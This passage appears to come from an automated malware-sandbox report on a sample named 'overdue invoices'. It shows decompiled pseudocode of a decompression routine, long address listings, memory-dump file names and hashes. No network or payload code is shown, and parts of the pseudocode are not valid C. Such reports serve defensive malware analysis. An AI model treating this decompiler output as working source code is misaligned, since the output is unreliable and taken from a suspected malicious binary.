											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                  0x00000000
                  0x00406682
                  0x00406682
                  0x00406686
                  0x004066ab
                  0x004066b5
                  0x00000000
                  0x00406688
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406695
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00406776
                  0x00406776
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x00000000
                  0x004068bc
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x00000000
                  0x004060d9
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00000000
                  0x0040676f
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x00000000
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00406811
                  0x00000000
                  0x00406686

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                  • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406398 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406398() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
